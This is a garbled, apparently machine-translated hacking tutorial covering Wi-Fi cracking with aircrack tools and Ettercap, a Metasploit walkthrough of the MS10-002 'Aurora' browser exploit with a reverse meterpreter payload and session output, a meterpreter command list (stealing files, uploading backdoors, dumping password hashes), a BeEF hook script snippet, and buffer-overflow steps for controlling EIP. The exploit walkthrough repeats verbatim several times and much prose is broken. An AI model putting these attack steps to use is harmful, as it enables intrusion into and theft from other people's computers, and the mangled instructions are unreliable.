HACKING WIRELES

Step one open terminal and wrait

# air (enter)

 the next you must wrait again

# airmon-ng (enter)

next step you ,writing again

#airmon-ng start wlan0 (enter)

 next step
#ifconfig for you looking the wlan0

next you write again
#airodump-ng mon0 (enter)

 # next

#proces scaning next''

# last next password haccking you coneking to wife open ETTERCAP

# next Sniff selet your tipe connection

#last next  Wireshark

# next  target one

#finished

BASIC COMMANDS METER PRETER

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole

 msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options

 
Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit

==>>The next after that typing back

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options

==>>The next after that typing back

msf exploit(ms10_002_aurora) > set URIPATH (nama file yg akan di krin).mp3
URIPATH => contoh  smangewe.mp3

see the pictures in the block

==>>then further re-typing the command

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

1. The help command 'help' will display the help menu on the terminal.
2. The background command 'background' returns us to the prompt msf / prompt before the exploit is executed.
3. ps command 'ps' is used to display the currently running processes.
4. migrate command 'migrate' is used to switch on the other.
5. ls 'ls' is used to display a list of files from a folder where we are.
6. download command 'download' is to download files from the victim's computer, and use the double-slashes (\\) to specify the directory.
7. upload command 'upload' is to upload a file into the victim's computer (usually backdoor), and use the double-slashes.
8. ipconfig command 'ipconfig' to display the network card / network interfaces and addresses of victims.
9. getuid command 'getuid' is to show the hostname of the victim's computer.
10. execute command 'execute' is to run the application the victim's computer.
11. shell command 'shell' is the command to get the shell of the victim's computer (usually command prompt windows).
12. idletime command 'idletime' is the command to determine the length of time of computer usage.
13. hasdump command 'hashdump' to display data from the SAM file.
14.? Command '? 'Is to get help from meterpreter.
15. The command channel 'channel' to display the currently active channel.
16. The close command is 'close' to get out of the channel.
17. exit command 'exit' to exit from the current session.
18. Interact command 'Interact' for interaction with the channel.
19. irb command 'irb' to run a ruby ​​shell command.
20. quit command 'quit' back to the terminal meterpreter and out of the active session.
21. read command 'read' to read the data from the channel.
22. Run command is 'run' to be able to run the script meterpreter.
23. write command 'write' is used to write into the channel.
24. paint command 'cat' is used to read a file.

EXSPLOIT CLIEN ATTACK SITE AT COMBINE WITH BEEF

==>>Open windows in VirtualBox

 

==>> further into the terminal. we will be to exsploit brouser in windows xp it then typing the command terminal

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

==>>then the next we enter the command start by typing commands exsploit ago exsploit ago
msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit

==>>The next after that typing back

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options

==>>The next after that typing back

msf exploit(ms10_002_aurora) > set URIPATH (nama file yg akan di krin).mp3
URIPATH => contoh  smangewe.mp3

see the pictures in the block

==>>then further re-typing the command

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

==>> The next step typing back

msf exploit (ms10_002_aurora)> exploit

==>> then enter it will appear


[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit

==>> then copy the file brouser which appears at the top of that and get into the next stage of entry into windows in virtualbox and c

copy website on the internet before ExSplorer.

==>>then subsequently returned to the terminal and typing


msf exploit(ms10_002_aurora) > sessions -l

==>>then the note

Active sessions
===============

  Id  Type                   Information           Connection
  --  ----                   -----------           ----------
  1   meterpreter x86/win32  XPSP3\XP SP3 @ XPSP3  192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)

msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed.  Reason: Died
The sign EXSPLOIT WE SEND ALREADY WORKED

then automatically we will go into early tampialan further beef bka termina to enter beef BEEF typing in terminal

┌─[root@parrot]─[/home/budhya]
└──╼ #service beef-xss start

┌─[root@parrot]─[/home/budhya]
└──╼ #beef-xss -h
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

(process:18938): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml

then automatically we will go into early tampialan beef

Masuka user name and passworduser name : beef
password  : beef

 

The next entry to the original view beef

then we can use within their meef our purposes.

Social Engineering Toolkit

Overview of the Social Engineering Toolkit (SET)

This time we will discuss about the use of SET on the machine BackTrack 5 for hacking the windows machine, but before we proceed further on the discussion I would like to express a little introduction about the SET is very useful for Nubee.

SET is a python script based programming language that contains a set of tools that are focused to carry out attacks against weakness user / man in Pen-Test. The main purpose of SET is Soc-Eng simulate the attack so as to allow the testers a system to effectively be able to test how the attack can work well.

Social-Engineering Toolkit is available as standard equipment in the BT5.

EXSPLOIT CLIEN SITE ATTACK

==>>Open windows in VirtualBox

 

==>> further into the terminal. we will be to exsploit brouser in windows xp it then typing the command terminal

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

==>>then the next we enter the command start by typing commands exsploit ago exsploit ago
msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit

==>>The next after that typing back

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options

==>>The next after that typing back

msf exploit(ms10_002_aurora) > set URIPATH (nama file yg akan di krin).mp3
URIPATH => contoh  smangewe.mp3

see the pictures in the block

==>>then further re-typing the command

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

==>> The next step typing back

msf exploit (ms10_002_aurora)> exploit

==>> then enter it will appear


[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit

==>> then copy the file brouser which appears at the top of that and get into the next stage of entry into windows in virtualbox and c

copy website on the internet before ExSplorer.

==>>then subsequently returned to the terminal and typing


msf exploit(ms10_002_aurora) > sessions -l

==>>then the note

Active sessions
===============

  Id  Type                   Information           Connection
  --  ----                   -----------           ----------
  1   meterpreter x86/win32  XPSP3\XP SP3 @ XPSP3  192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)

msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed.  Reason: Died
The sign EXSPLOIT WE SEND ALREADY WORKED

EXSPLOITASI DEPELOPMEN

NAMELY FIRST STEP

1 open windows in virtualbox

it will display the initial screen windows

2 WAR enable FTP in advance and make sure the line is in a state of lightning aikon click on the upper end of the right section.

3.next into the terminal and typing [/ usr / share / metasploit / firework / tools and then enter]

4 Sign tahapn next  which entered into virtualbox and select the application Immunity Debugger

5, the next display appears before the start of Debugger which we choose

6 Further re-enter the terminal seterlah enter the terminal and the command that we had Kelik and enter then step selanjutnta sure fuzzing in keadann error by typing commands at the terminal before us
[/ Usr / share / metasploit / firework / tools and then enter]

then enter then enter ls back

7 The next step is typing the command to enter 1000 characters figure that we will send to the EIP which ./patteren_create.rb {1000} kemuadian enter

8 after a character appears we printahakan of 1000 was then the next character is mengkopikan smua hrup characters that we make the next step to change their way of buffers that initially normal letters with numbers we have made

9 furthermore, was after last edited by orders we make it back to the Debugger berikunya step was ligat characters that we created is entered atow yet

10 berikunta if the characters we created is entered to step up berikunya is no brapa looking character with the virus that we make

11 then the next is a check back on debuger have entered characters that we send

12 ie where ato command to check the module which we will input to control the EIP.

13 after the input code number that is on the module that we select in the editing had been before by means of nano fuzzer py. enter

14 after a number EIP replaced then we can shift command in the application that we are headed for example, in the calculator which is on windows xp before the stage next stage.